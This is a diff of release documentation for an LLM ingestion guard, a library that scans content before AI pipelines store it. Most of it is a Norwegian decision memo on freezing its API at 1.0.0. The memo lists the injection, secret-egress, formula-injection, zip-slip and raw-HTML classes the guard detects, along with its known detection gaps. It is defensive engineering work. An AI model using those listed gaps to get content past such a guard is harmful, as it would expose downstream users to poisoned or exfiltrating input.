- multimodal / binary-layer carriers (OCR, font stego, VBA/macros, encrypted files);
|
||||||
- the multilingual homoglyph-mix false positive.
|
- the multilingual homoglyph-mix false positive;
|
||||||
|
- a low `Severity` on an ordinary outward fetch — on the detection side 1.x does not
|
||||||
|
separate *what was seen* from *how bad it is*, so read the finding `id` for the
|
||||||
|
capability;
|
||||||
|
- the input-cap asymmetry at `MAX_INPUT_CHARS`: surfaces that return content raise
|
||||||
|
`OversizeInputError`, surfaces that return findings truncate and emit
|
||||||
|
`active:oversize-input`. Past the cap, "no finding" means "not looked at".
|
||||||
|
|
||||||
|
The last two are conceded for the whole of `1.x`, deliberately and in writing
|
||||||
|
(`docs/LIMITATIONS.md`): closing either changes an exported symbol's meaning and is
|
||||||
|
therefore a `2.0.0` change. The homoglyph false positive is conceded differently — no
|
||||||
|
fix is promised, but it is calibration, so one may land in any `1.x` release.
|
||||||
|
|
||||||
If you are unsure whether something is in scope, report it privately anyway.
|
If you are unsure whether something is in scope, report it privately anyway.
|
||||||
|
|
||||||
|
|
|
||||||
|
|
@ -4,9 +4,11 @@
|
||||||
especially one converging on Google's Open Knowledge Format (OKF v0.1) — and needs
|
especially one converging on Google's Open Knowledge Format (OKF v0.1) — and needs
|
||||||
to decide **when** and **where** to add a write-time ingestion guard.
|
to decide **when** and **where** to add a write-time ingestion guard.
|
||||||
|
|
||||||
**Status of the guard:** `v0.6.1` (alpha). Stdlib-only core, framework-agnostic.
|
**Status of the guard:** `v1.2.0`. Stdlib-only core, framework-agnostic. The
|
||||||
Public API may still change. Read the known-limitations section before you rely
|
exported Python surface is frozen under semver — nothing exported is removed,
|
||||||
on it.
|
renamed or given a different meaning without a `2.0.0`. Detection behaviour is
|
||||||
|
*not* frozen: severities, thresholds and lexicon entries are calibration and move
|
||||||
|
in `1.x`. Read the known-limitations section before you rely on it.
|
||||||
|
|
||||||
This brief is self-contained: you can plan an inclusion from it alone. Every
|
This brief is self-contained: you can plan an inclusion from it alone. Every
|
||||||
technical claim below is checkable against the guard repo (commands given inline).
|
technical claim below is checkable against the guard repo (commands given inline).
|
||||||
|
|
@ -140,9 +142,9 @@ live payload:
|
||||||
python -m llm_ingestion_guard.coverage # exit 0 = all as documented
|
python -m llm_ingestion_guard.coverage # exit 0 = all as documented
|
||||||
```
|
```
|
||||||
|
|
||||||
As of `v0.6.1`: **128 / 128 defended classes demonstrated (recall 100%)** and **6 /
|
As of `v1.2.0`: **130 / 130 defended classes demonstrated (recall 100%)** and **6 /
|
||||||
6 documented gaps still hold** (a *closed* gap fails the test, forcing a doc
|
6 documented gaps still hold** (a *closed* gap fails the test, forcing a doc
|
||||||
update). The matrix is the single source of truth for the test suite (**736
|
update). The matrix is the single source of truth for the test suite (**834
|
||||||
passing**), which also asserts total recall, that every lexicon pattern has a
|
passing**), which also asserts total recall, that every lexicon pattern has a
|
||||||
case (so the matrix cannot fall behind the lexicon), the full LLM02 secret-egress
|
case (so the matrix cannot fall behind the lexicon), the full LLM02 secret-egress
|
||||||
set, and the container-layer front-end (CSV formula-injection, zip-slip/bomb,
|
set, and the container-layer front-end (CSV formula-injection, zip-slip/bomb,
|
||||||
|
|
|
||||||
|
|
@ -3,7 +3,7 @@
|
||||||
**A reusable, minimal, dependency-light defensive layer for LLM *ingestion*
|
**A reusable, minimal, dependency-light defensive layer for LLM *ingestion*
|
||||||
pipelines — the write-time siblings of query-time chatbot guardrails.**
|
pipelines — the write-time siblings of query-time chatbot guardrails.**
|
||||||
|
|
||||||
Status: implemented — v0.6 (alpha). This document defines what the repo contains
|
Status: implemented — v1.2.0, exported surface frozen under semver. This document defines what the repo contains
|
||||||
and why; the stdlib-only core is built and tested (see `README.md` for usage and
|
and why; the stdlib-only core is built and tested (see `README.md` for usage and
|
||||||
`docs/PLAN.md` for the build order).
|
`docs/PLAN.md` for the build order).
|
||||||
|
|
||||||
|
|
|
||||||
358
docs/GATE-G-v1.md
Normal file
358
docs/GATE-G-v1.md
Normal file
|
|
@ -0,0 +1,358 @@
|
||||||
|
# Beslutningsgrunnlag — Session G, v1.0-frysen
|
||||||
|
|
||||||
|
**Målt:** 2026-08-13, mot `HEAD` = `2466d26` (v0.7.0 + tre test-commits).
|
||||||
|
**Hva dette er:** underlaget for én operatørbeslutning — skal Python-surfacen fryses
|
||||||
|
som `1.0.0`. **Hva dette ikke er:** beslutningen. Ingen tag, ingen versjonsbump,
|
||||||
|
ingen frosset surface er utført i økten som skrev dette. Ingen kode er endret.
|
||||||
|
|
||||||
|
Alle tall her er produsert av en kommando i samme økt; verifiseringsloggen står
|
||||||
|
nederst. `docs/PLAN-v1.md:231` er gate-teksten dette måles mot.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## 1. Rammen som gjør gaten tellbar
|
||||||
|
|
||||||
|
`docs/PLAN-v1.md:24` sier det selv: **v1.0 er primært et governance-løfte under
|
||||||
|
semver.** Det er ikke en påstand om at biblioteket er ferdig, og ikke en påstand om
|
||||||
|
at de 35 begrensningene er borte. Uten den rammen leses `docs/LIMITATIONS.md` som 35
|
||||||
|
blokkere, og dokumentet argumenterer mot sin egen konklusjon.
|
||||||
|
|
||||||
|
Med rammen blir spørsmålet tellbart: **hvor mange av de 35 kan bare lukkes ved å
|
||||||
|
endre betydningen, formen eller medlemskapet til noe i `__all__`?** Bare de blokkerer,
|
||||||
|
fordi bare de tvinger `2.0.0`. Tre bøtter, én per begrensning:
|
||||||
|
|
||||||
|
- **(a)** lukkes med kalibrering, lexicon-data eller et predikat → ikke-brytende
|
||||||
|
- **(b)** lukkes additivt (ny funksjon, nytt felt, ny implementasjon i en eksisterende søm) → minor
|
||||||
|
- **(c)** lukkes bare ved å endre et eksportert symbols betydning eller form → **major**
|
||||||
|
- **(–)** kan ikke lukkes i det hele tatt (permanent konsesjon, scope-grense, ren måling)
|
||||||
|
|
||||||
|
En fjerde akse er **uavhengig av semver og må ikke blandes med den**: hvilke
|
||||||
|
begrensninger som, når de lukkes, fyrer konsument-varslingsplikten i
|
||||||
|
`docs/PLAN-v1.md:419`. Et løfte kan brytes av en endring som er helt lovlig under
|
||||||
|
semver. Den aksen er merket separat under.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## 2. Gatens literalkrav — hva som faktisk er sant
|
||||||
|
|
||||||
|
### 2.1 Session A–F ferdig — **OPPFYLT**
|
||||||
|
|
||||||
|
F var den siste operatør-gaten, og den landet som anbefalt spor F1 (konsesjon), ikke
|
||||||
|
som TODO: `docs/PLAN.md:309` fører `.pdf`-raden som **conceded**, `docs/PLAN.md:323`
|
||||||
|
og `README.md:226` beskriver den som «refused as an unsupported format», ikke som et
|
||||||
|
kjent hull. A, A2, B, C, D, E er ute i tagger (`v0.3.0`–`v0.7.0`, tolv tagger totalt).
|
||||||
|
|
||||||
|
### 2.2 Suite, dekningsmatrise og dokumenttall — **OPPFYLT, re-målt**
|
||||||
|
|
||||||
|
| påstand | kilde | målt i dag |
|
||||||
|
|---|---|---|
|
||||||
|
| 792 tester | STATE | `792 passed in 13.11s` |
|
||||||
|
| 129/129 klasser | STATE/README | `Caught classes: 129/129 demonstrated (recall 100%)` |
|
||||||
|
| 6/6 dokumenterte gap | STATE | `Documented gaps: 6/6 still hold as documented` |
|
||||||
|
| 35 begrensninger | README | `grep -c '^- \*\*'` → `35` |
|
||||||
|
|
||||||
|
Ingen avvik. `CHANGELOG.md` `[Unreleased]` er tom («Nothing yet»), så det finnes
|
||||||
|
ingen ushippet atferd som frysen ville binde uten å ha beskrevet.
|
||||||
|
|
||||||
|
### 2.3 Ni versjonsflater synkrone — **OPPFYLT på 0.7.0**
|
||||||
|
|
||||||
|
Alle ni current-state-flatene `docs/PLAN-v1.md:277` navngir står på 0.7.0:
|
||||||
|
`pyproject.toml:7`, `__init__.py:66`, README badge/status/install-pin (`:5`, `:36`,
|
||||||
|
`:46`), `SECURITY.md:9` («pre-1.0 (`0.7.x`, alpha)»), `docs/BRIEF.md:6`,
|
||||||
|
`CLAUDE.md:14`, `docs/ADOPTION-BRIEF.md:7`/`:143`. Sorteringen current-state vs.
|
||||||
|
proveniens er ikke gjort her — den hører til selve release-utførelsen, og
|
||||||
|
`docs/PLAN-v1.md:290` sier den kommer før første redigering.
|
||||||
|
|
||||||
|
### 2.4 «Første ekte integrasjon grønn» — **IKKE OPPFYLT ETTER BOKSTAVEN, dekket etter hensikten**
|
||||||
|
|
||||||
|
Dette er gatens tyngste krav og det eneste som ikke lar seg avgjøre med en kommando i
|
||||||
|
dette repoet. Måling av hva som faktisk foreligger, lest fra coord-arkivet:
|
||||||
|
|
||||||
|
| dato | hva okf faktisk gjorde | guard-versjon |
|
||||||
|
|---|---|---|
|
||||||
|
| 2026-07-26 | 0.3.1-målingen **utsatt** (kvote) | — |
|
||||||
|
| 2026-07-31 | «signalet er mottatt og rutet, kjøringen er ikke gjort» | — |
|
||||||
|
| 2026-08-02 | scratch-venv, resolvet versjon bekreftet via `importlib.metadata`, ingen nye avvik | **0.3.4** |
|
||||||
|
| 2026-08-12 | differensial på egen dør, begge dører, Python 3.11 **og** 3.14, tagger resolvet | **0.3.4 → 0.6.1** |
|
||||||
|
|
||||||
|
**Kjøringen gaten ber om ordrett — fixture-settet grønt mot `v0.3.1` — ble aldri
|
||||||
|
gjort.** Den ble utsatt to ganger og deretter overhalt av virkeligheten: okf gikk rett
|
||||||
|
på 0.3.4 og senere på en 0.3.4→0.6.1-differensial.
|
||||||
|
|
||||||
|
Målt mot gatens **hensikt** (`docs/PLAN-v1.md:19-25`: bevisbyrden skal komme utenfra,
|
||||||
|
og release-hygienen skal ha overlevd én ekte syklus) er det som foreligger sterkere
|
||||||
|
enn det som ble bestilt: en differensial på konsumentens egen dør, på to
|
||||||
|
Python-versjoner, med taggene resolvet — som dessuten **korrigerte en påstand vi
|
||||||
|
hadde publisert** («raw-html loosening is 1 of 3 forms»). En fixture-kjøring mot en
|
||||||
|
tagg vi valgte ville ikke ha gjort det.
|
||||||
|
|
||||||
|
**Restgapet er presist og lite: ingen har kjørt 0.7.0-runtimen.** Nyeste guard-versjon
|
||||||
|
noen integrator har eksekvert er **0.6.1**. 0.7.0-deltaet er bærersplitten og
|
||||||
|
no-URL-narrowingen. Det deltaet har én ekstern kryss-sjekk fra en annen vinkel:
|
||||||
|
`llm-security-commons` bygde klassifikatoren opp igjen fra sin egen JSON, uten import
|
||||||
|
fra pakken vår, og differensialtestet mot `active_tag_class` over 42 probe-tagger med
|
||||||
|
**0 uenigheter**. Det validerer klassifikatoren som *data*, ikke runtime-atferden.
|
||||||
|
|
||||||
|
### 2.5 Surface-deltaet siden sist eksternt pinnede versjon — **MÅLT**
|
||||||
|
|
||||||
|
`git diff v0.3.4..HEAD -- src/llm_ingestion_guard/__init__.py`, per symbol:
|
||||||
|
|
||||||
|
| symbol | endring siden 0.3.4 | semver-klasse | målt eksternt? |
|
||||||
|
|---|---|---|---|
|
||||||
|
| `Risk` | **lagt til** (0.5.0, aksesplittelsen) | additiv | nei |
|
||||||
|
| `DEFAULT_ACTION_MAP` | **lagt til** (0.5.0) | additiv | nei |
|
||||||
|
| `assert_within_input_cap` | **lagt til** (0.4.0) | additiv | nei |
|
||||||
|
| `OversizeInputError` | **lagt til** (0.4.0) | additiv | nei |
|
||||||
|
| alle øvrige 42 | uendret navn og signatur | — | 0.3.4 / 0.6.1 |
|
||||||
|
|
||||||
|
**Ingen symboler er fjernet eller omdøpt siden 0.3.4.** Verifisert med
|
||||||
|
`git diff v0.3.4..HEAD -- __init__.py | grep '^-'`: de eneste slettede linjene er
|
||||||
|
versjonsstrengen, en kommentar, og en `__all__`-linje som ble skrevet om for å
|
||||||
|
*legge til* navn. Hele surface-veksten er additiv.
|
||||||
|
|
||||||
|
`__all__` er ikke hele den frosne flaten — `okf` eksporteres som navnerom, så
|
||||||
|
signaturene der fryses også. Målt separat
|
||||||
|
(`git diff v0.3.4..HEAD -- okf.py | grep -E '^[-+](def |class )'`): én endring,
|
||||||
|
`link_graph(bundle)` → `link_graph(bundle, max_scan_chars=MAX_SCAN_CHARS)`. En
|
||||||
|
keyword-parameter med default, bakoverkompatibel for enhver eksisterende kaller —
|
||||||
|
men den gjør `okf.link_graph`s trunkeringsgrense til del av kontrakten fra 1.0.0. Det som *har* flyttet seg er atferd inne i allerede eksporterte funksjoner —
|
||||||
|
elleve commits over `src/`, hvorav de som endrer utfall er: input-cap-refusjonen
|
||||||
|
(0.4.0), aksesplittelsen (0.5.0), rå-HTML-narrowingen (0.6.0), ZWJ-kontekstfiksen
|
||||||
|
(0.6.1) og bærersplitten (0.7.0).
|
||||||
|
|
||||||
|
Det er den ærlige formuleringen av risikoen ved å fryse nå: **formen er stabil,
|
||||||
|
atferden har beveget seg i fem strekk, og fire eksporterte symboler har aldri vært
|
||||||
|
gjennom en ekstern kjøring.**
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## 3. De 35 begrensningene, bøttet
|
||||||
|
|
||||||
|
Hver rad navngir det eksporterte symbolet lukkingen ville røre, eller «ingen».
|
||||||
|
Linjenummer er `docs/LIMITATIONS.md`. **⚠️ = lukking fyrer konsument-løfte 1.**
|
||||||
|
|
||||||
|
| # | linje | begrensning (kort) | rører | bøtte |
|
||||||
|
|---|---|---|---|---|
|
||||||
|
| 1 | :7 | strukturell uløselighet i tekstlaget | ingen | – |
|
||||||
|
| 2 | :11 | lone HIGH i trusted prosa → WARN | `PRESET_TRUSTED_SOURCE`, `Policy` | a |
|
||||||
|
| 3 | :17 | karantenegulvet er no-op under upload-preset | `Policy.quarantine_default` | a |
|
||||||
|
| 4 | :26 | semantisk/faktisk poisoning usynlig | `SourceGroundingCheck` (søm finnes) | b |
|
||||||
|
| 5 | :30 | adversarial-ML-evasion, tokenizer-mismatch | ingen | – |
|
||||||
|
| 6 | :33 | dormant / broken-link-injeksjon | `okf.link_graph` | b |
|
||||||
|
| 7 | :38 | OKF reserverte filer (`index.md`/`log.md`) | `okf.import_bundle` | – (avgjort i A2) |
|
||||||
|
| 8 | :43 | én-nøkkels blokksekvens misparses stille | `okf.import_bundle` | b ⚑ |
|
||||||
|
| 9 | :63 | T2 begrenser import, ikke emisjon | `okf` | b |
|
||||||
|
| 10 | :68 | OKF v0.2-konsept kan ikke traversere import | `okf` | b |
|
||||||
|
| 11 | :75 | persist-gate dekker ikke kjøringsrisiko | ingen | – |
|
||||||
|
| 12 | :83 | dokument som *beskriver* angrep er FP | ingen | – |
|
||||||
|
| 13 | :88 | tospråklig tekst tripper homoglyf-regelen | lexicon-data | a ⚑ *(«fix is pending»)* |
|
||||||
|
| 14 | :93 | insider-redigeringer utenfor trusselmodell | ingen | – |
|
||||||
|
| 15 | :95 | text-only, parser ingen filer | ingen | – |
|
||||||
|
| 16 | :99 | kun ekstrahert tekst skannes; `.pdf` konsedert | dev-showcase | – (F1) |
|
||||||
|
| 17 | :112 | lexicon-funn dedupliseres per id (`count=1`) | `Finding.count` | a |
|
||||||
|
| 18 | :115 | ren beaconing er bare LOW | `calibration.py` | a ⚠️ |
|
||||||
|
| 19 | :123 | korte opake URL-segmenter slipper gjennom | `scan_entropy`-terskler | a |
|
||||||
|
| 20 | :130 | percent-escapes teller som databærende | kalibrering | a ⚠️ |
|
||||||
|
| 21 | :166 | percent-escape slår ut tokeniseringen | kalibrering | a |
|
||||||
|
| 22 | :190 | legitime CDN-hex-id-er tripper permanent | kalibrering | a |
|
||||||
|
| 23 | :197 | ikke-tom query graderes som databærende | kalibrering | a ⚠️ |
|
||||||
|
| 24 | :219 | rå-HTML-residualet er ekte HTML, ikke over-reach | `is_active_tag` | a |
|
||||||
|
| 25 | :267 | bærersplitten strammer trusted tier | shippet 0.7.0 | – |
|
||||||
|
| 26 | :292 | `count` teller ikke lenger endetagger | `Finding.count` | – (allerede flyttet) |
|
||||||
|
| 27 | :300 | stor minoritet av benigne dokumenter persisterer ikke | måling | – |
|
||||||
|
| 28 | :391 | URL-fragmenter graderes ikke | kalibrering | a ⚠️ |
|
||||||
|
| 29 | :396 | hex-innpakket secret-egress fanges ikke | `scan_entropy` | b |
|
||||||
|
| 30 | :402 | prosa som nevner `<script>` fyrer XSS-labelen | lexicon-data | a |
|
||||||
|
| 31 | :426 | connstr-passord >256 tegn matches ikke | `MAX_CONNSTR_VALUE` | a |
|
||||||
|
| 32 | :441 | ReDoS-sveipet har en målt følsomhetsgrense | metode | – |
|
||||||
|
| 33 | :460 | **cap-asymmetrien: noen reiser, andre trunkerer** | `OversizeInputError` + tre funksjoner | **c** |
|
||||||
|
| 34 | :492 | **`Severity` bærer fortsatt disposisjonsintensjon** | `Severity`, `Finding` | **c** ⚠️ |
|
||||||
|
| 35 | :511 | ZWJ mellom emoji unntatt; ZWNJ urørt | predikat/kalibrering | a |
|
||||||
|
|
||||||
|
**Sum: 2 i bøtte (c). 6 i (b). 15 i (a). 12 kan ikke lukkes.**
|
||||||
|
|
||||||
|
### De to (c)-punktene — den faktiske gaten
|
||||||
|
|
||||||
|
**:492 — `Severity` bærer disposisjonsintensjon.** 0.5.0 skilte vurdering (`Risk`) fra
|
||||||
|
handling (`Disposition`), men bare på *kallersiden*. Inne i detektorene er en `Finding`s
|
||||||
|
`Severity` fortsatt kalibrert delvis etter disposisjonen den skal produsere. To steder i
|
||||||
|
treet sier det rett ut (`ACTIVE_CONTENT_ORDINARY_SEVERITY = LOW`, og karantenegulvet
|
||||||
|
hevet til MEDIUM+). Kostnaden: en ordinær ekstern `<img>` registreres som lav severity
|
||||||
|
i stedet for som *en reell utoverrettet fetch-kapabilitet som ikke er bevis på angrep* —
|
||||||
|
så ingen policy, uansett streng, kan handle på kapabiliteten, fordi detektoren allerede
|
||||||
|
har bestemt at den ikke betydde noe. Lukking krever en kanal som sier hva som ble sett
|
||||||
|
atskilt fra hvor ille det er. Det endrer `Finding` og `Severity`. **Det er `2.0.0`.**
|
||||||
|
Det fyrer også løfte 1.
|
||||||
|
|
||||||
|
**:460 — cap-asymmetrien.** `sanitize`, `fence` og `neutralize` **reiser**
|
||||||
|
`OversizeInputError` over 1 000 000 tegn; deteksjonsflatene **trunkerer** og emitterer
|
||||||
|
`active:oversize-input`. Begge valg er begrunnet (de tre returnerer *innhold*, der en
|
||||||
|
avkortet retur er stille datatap eller en bypass). Men asymmetrien er en
|
||||||
|
*surface*-egenskap, ikke kalibrering: å gjøre dem like senere betyr enten en ny
|
||||||
|
exception der en kaller i dag får en verdi, eller motsatt. **Frysen gjør asymmetrien
|
||||||
|
permanent i 1.x.**
|
||||||
|
|
||||||
|
Ingen av de to er defekter som må fikses. Begge er valg som må **konsederes bevisst og
|
||||||
|
skriftlig** før frysen, ikke stå som «deferred». Forskjellen mellom en konsesjon og en
|
||||||
|
utsettelse er nettopp hva 1.0.0 lover.
|
||||||
|
|
||||||
|
### Én åpen korrekthetsdefekt som ikke er (c)
|
||||||
|
|
||||||
|
`:43` — en blokksekvens med **nøyaktig én** nøkkel per element parses stille til feil
|
||||||
|
type (`sources:\n - uri: https://e.com/a` gir strengen, ikke en mapping), slik at en
|
||||||
|
peker kan ri gjennom i en nøkkel `resource`-allowlisten aldri inspiserer. Lukking
|
||||||
|
strammer hva `okf.import_bundle` slipper inn — atferd, ikke form, og konvensjonelt
|
||||||
|
shippbart i en minor med note. Den blokkerer altså ikke frysen, men den bør **ikke
|
||||||
|
oppdages av noen andre etter at vi har lovet stabilitet**. Nevnt her fordi «vi visste,
|
||||||
|
og valgte å fryse først» er en holdbar posisjon og «vi hadde glemt den» ikke er det.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## 4. De to låste konsumentløftene — målt før/etter i samme økt
|
||||||
|
|
||||||
|
`docs/PLAN-v1.md:419` binder oss til å varsle `linkedin-studio` **før** enhver endring
|
||||||
|
i graderingen av ordinære lenker/bilder under `PRESET_USER_UPLOAD`. De pinner v0.3.1.
|
||||||
|
Mellom 0.3.1 og 0.7.0 flyttet både rå-HTML-narrowingen og bærersplitten grading. Spørsmålet
|
||||||
|
er om noen av dem traff den lovede stien. Målt med samme probe mot begge trær
|
||||||
|
(`git archive v0.3.1` scratch-tre vs. `HEAD`), samme økt:
|
||||||
|
|
||||||
|
| tilfelle | v0.3.1 | v0.7.0 |
|
||||||
|
|---|---|---|
|
||||||
|
| ordinær markdown-lenke | WARN / LOW | WARN / LOW |
|
||||||
|
| ordinært markdown-bilde | WARN / LOW | WARN / LOW |
|
||||||
|
| autolink | WARN / LOW | WARN / LOW |
|
||||||
|
| refdef | WARN / LOW | WARN / LOW |
|
||||||
|
| relativ lenke | WARN / rent | WARN / rent |
|
||||||
|
| lenke med query | QUARANTINE_REVIEW / MEDIUM | QUARANTINE_REVIEW / MEDIUM |
|
||||||
|
| `<a href="…">` | FAIL_SECURE / HIGH | **QUARANTINE_REVIEW / MEDIUM** |
|
||||||
|
| `<a aria-label="…">` | FAIL_SECURE / HIGH | **WARN / rent** |
|
||||||
|
| `</a>` | FAIL_SECURE / HIGH | **WARN / rent** |
|
||||||
|
| `<iframe src>` | FAIL_SECURE / HIGH | FAIL_SECURE / HIGH |
|
||||||
|
| `<div onclick>` | FAIL_SECURE / HIGH | FAIL_SECURE / HIGH |
|
||||||
|
| ZWJ-komponert emoji | FAIL_SECURE / HIGH | **WARN / rent** |
|
||||||
|
|
||||||
|
**Løfte 1 er ikke brutt på den stien det navngir.** Alle fire ordinære
|
||||||
|
markdown-formene — lenke, bilde, autolink, refdef — gir identisk disposisjon og
|
||||||
|
identisk max-severity på 0.3.1 og 0.7.0. Det er den formen `linkedin-studio` pinner og
|
||||||
|
bygger på.
|
||||||
|
|
||||||
|
**Fire rader flyttet seg likevel, og alle i løsnende retning.** Tre rå-HTML-bærere og
|
||||||
|
ZWJ-fiksen. Løftets ordlyd er «ordinære lenker/bilder», og en `<a href>` *er* en
|
||||||
|
ordinær lenke — bare i en annen bærer enn den løftet ble skrevet om. Løftets
|
||||||
|
*begrunnelse* er derimot eksplisitt: «en stille re-stramming lander som
|
||||||
|
produksjonsincident hos dem». Ingen av de fire er en stramming. **Om ordlyden eller
|
||||||
|
begrunnelsen styrer, er en operatørbeslutning** (D4 under). Å konstatere bevegelsen er
|
||||||
|
vår plikt; å avgjøre om den fyrer løftet er ikke.
|
||||||
|
|
||||||
|
**Den ene grenen har en konsekvens som allerede er påløpt, og den må stå ved siden av
|
||||||
|
valget.** Løftet krever varsel **før** endringen shippes. Styrer ordlyden, ble varselet
|
||||||
|
ikke gitt — ikke for 0.6.0, ikke for 0.6.1 og ikke for 0.7.0. `docs/PLAN-v1.md:423`
|
||||||
|
kaller det å bryte ett av de to løftene stille «en release-defekt, ikke en preferanse».
|
||||||
|
1.0.0 ville da være fjerde utgivelse forbi det. Botemiddelet på den grenen er et
|
||||||
|
etterskuddsvarsel til `linkedin-studio` **før** frysen, med de fire målte radene — men
|
||||||
|
det er operatørens å autorisere, ikke vår å sende på eget initiativ, nettopp fordi det
|
||||||
|
er en innrømmelse av brudd.
|
||||||
|
|
||||||
|
**Hva proben sammenlignet, og hva den ikke gjorde.** Den sammenlignet `disposition` og
|
||||||
|
`max_severity`. Den sammenlignet **ikke** label-identitet, og konsumenter nøkler på
|
||||||
|
labels. «Identisk» i tabellen over betyr altså identisk utfall, ikke bevist identisk
|
||||||
|
label-sett.
|
||||||
|
|
||||||
|
Løfte 2 (relativ-mål-asymmetrien mot `llm-ingestion-okf`) er urørt: den relative lenken
|
||||||
|
er ren på begge versjoner.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## 5. Hva 1.0.0 faktisk binder oss til
|
||||||
|
|
||||||
|
Positivt, og verdt å si tydelig fordi det er lett å undervurdere: **surfacen har ikke
|
||||||
|
mistet et eneste symbol siden 0.3.4.** Hele veksten er additiv. Fire minor-utgivelser
|
||||||
|
har lagt til fire navn og ikke fjernet noen. Det er nettopp den formstabiliteten en
|
||||||
|
1.0 lover, og den er målt, ikke antatt.
|
||||||
|
|
||||||
|
Det 1.0.0 binder:
|
||||||
|
|
||||||
|
1. `__all__` med sine 46 navn (`len(llm_ingestion_guard.__all__)`) — ingen kan fjernes
|
||||||
|
eller omdøpes før `2.0.0`.
|
||||||
|
2. `Severity`s doble rolle (:492) — permanent i 1.x.
|
||||||
|
3. Cap-asymmetrien (:460) — permanent i 1.x.
|
||||||
|
4. `Finding.count`s betydning, som *nettopp* flyttet i 0.7.0 (:292). Frysen kommer én
|
||||||
|
utgivelse etter at et publisert felt endret tallverdi for hvert dokument med `</a>`.
|
||||||
|
5. `DEFAULT_ACTION_MAP` som del av kontrakten, ikke som implementasjonsdetalj.
|
||||||
|
|
||||||
|
Punkt 4 er den skarpeste innvendingen mot å fryse akkurat nå, og den fortjener å stå
|
||||||
|
uten pynt: vi ville fryse feltet ett steg etter at det sist beveget seg.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## 6. Den lukkede beslutningsmengden
|
||||||
|
|
||||||
|
Seks beslutninger. Ingen av dem kan tas av denne økten.
|
||||||
|
|
||||||
|
| # | beslutning | status |
|
||||||
|
|---|---|---|
|
||||||
|
| **D1** | Teller okfs 0.3.4-måling + 0.3.4→0.6.1-differensialen som gatens «første ekte integrasjon grønn», når 0.3.1-kjøringen gaten ber om aldri ble gjort? | **operatørvalg** |
|
||||||
|
| **D2** | Skal frysen skje på 0.7.0, når nyeste eksternt kjørte runtime er 0.6.1? Alternativer: (i) frys på 0.7.0 nå og før restgapet som residual, (ii) be okf kjøre sin eksisterende differensial én gang til på 0.7.0 først, (iii) frys på 0.6.1-atferd. | **operatørvalg** |
|
||||||
|
| **D3** | Skal :492 (`Severity`-kanalen) og :460 (cap-asymmetrien) konsederes permanent i 1.x og skrives om fra «deferred» til konsesjon — eller lukkes før frysen? | **operatørvalg** |
|
||||||
|
| **D4** | Fyrer rå-HTML-løsningen 0.3.1→0.7.0 varslingsplikten mot `linkedin-studio`? Ordlyden («ordinære lenker/bilder») sier kanskje ja; begrunnelsen (stramming = incident) sier nei. **Sier ordlyden ja, er varselet allerede uteblitt i tre utgivelser, og valget inkluderer om et etterskuddsvarsel skal gå ut før frysen.** | **operatørvalg** |
|
||||||
|
| **D5** | :88 sier «a calibration fix is pending». Skal den lukkes før frysen, eller skrives om til en konsesjon? En løs ende med ordet «pending» i en 1.0 er et løfte vi ikke har gitt. | **operatørvalg** |
|
||||||
|
| **D6** | Er 0.7.0 `active_tag_class` en *settled shape* `llm-security-commons` kan pinne som data en tredje implementør holdes til? Dette **er** frysebeslutningen for den flaten — svaret på deres melding følger av D2. | **operatørvalg** |
|
||||||
|
| — | A–F ferdig; suite/dekning/dokumenttall; ni versjonsflater synkrone; `[Unreleased]` tom | **oppfylt** |
|
||||||
|
| — | Fixture-kjøring grønn mot `v0.3.1` etter gatens ordlyd | **ikke oppfylt, og blir det ikke** |
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## 7. Anbefaling
|
||||||
|
|
||||||
|
**Gaten bør åpnes, på 0.7.0, uten å vente — D2 (i).** Med to forbehold som ikke koster
|
||||||
|
en økt hver.
|
||||||
|
|
||||||
|
Begrunnelsen er ikke at bevisene er komplette. Den er at det som mangler er tynt og
|
||||||
|
kryss-sjekket fra en annen kant: 0.7.0-deltaet er én klassifikator, og den er
|
||||||
|
uavhengig rekonstruert av `llm-security-commons` fra deres egen JSON og
|
||||||
|
differensialtestet mot vår over 42 probe-tagger med 0 uenigheter. Fire eksporterte
|
||||||
|
symboler er aldri eksternt kjørt, men alle fire er *additive* — en konsument som ikke
|
||||||
|
kaller dem merker dem ikke.
|
||||||
|
|
||||||
|
**Motargumentet, som er reelt:** 0.7.0 er nøyaktig det området okf har målt to ganger,
|
||||||
|
og `Finding.count` flyttet seg der for én utgivelse siden. En integrator som er primet
|
||||||
|
til å måle akkurat dette billig, er den beste kilden vi har. Det som taler imot å vente
|
||||||
|
er historikken: 0.3.1-målingen ble utsatt 26. juli, aldri hentet inn, og overhalt av at
|
||||||
|
okf gikk videre på egen hånd. **En gate som venter på et annet repos kvote er en gate
|
||||||
|
som kan bli stående åpen i ukevis.** Vi bør varsle okf om 0.7.0, ikke gjøre frysen
|
||||||
|
avhengig av at de svarer.
|
||||||
|
|
||||||
|
**Forbehold 1 (D3):** skriv :492 og :460 om fra «deferred deliberately» til
|
||||||
|
«konsedert i 1.x» i `LIMITATIONS.md`, og la `SECURITY.md` si hva 1.x faktisk lover.
|
||||||
|
Det er tekstarbeid, ikke kodearbeid, og det er forskjellen mellom et løfte vi kan holde
|
||||||
|
og et vi bare har formulert.
|
||||||
|
|
||||||
|
**Forbehold 2 (D5):** ta ordet «pending» ut av :88, i én av to retninger. Enten lukkes
|
||||||
|
kalibreringen, eller så er den en konsesjon.
|
||||||
|
|
||||||
|
**Det som ville endret anbefalingen:** at okf svarer at 0.7.0-bærersplitten treffer
|
||||||
|
deres `.md`-dør i en form de ikke har målt. Da er én kjøring verdt ventetiden, fordi
|
||||||
|
det er den eneste flaten hvor 0.7.0 kan ha gjort noe vi ikke vet om.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## 8. Verifiseringslogg
|
||||||
|
|
||||||
|
| påstand | kommando | resultat |
|
||||||
|
|---|---|---|
|
||||||
|
| suite grønn | `PYTHONPATH=src .venv/bin/pytest` | `792 passed in 13.11s` |
|
||||||
|
| dekning | `PYTHONPATH=src .venv/bin/python -m llm_ingestion_guard.coverage` | `129/129`, `6/6`, exit 0 |
|
||||||
|
| 35 begrensninger | `grep -c '^- \*\*' docs/LIMITATIONS.md` | `35` |
|
||||||
|
| surface-delta | `git diff v0.3.4..HEAD -- src/llm_ingestion_guard/__init__.py` | 4 tillegg, 0 fjerninger |
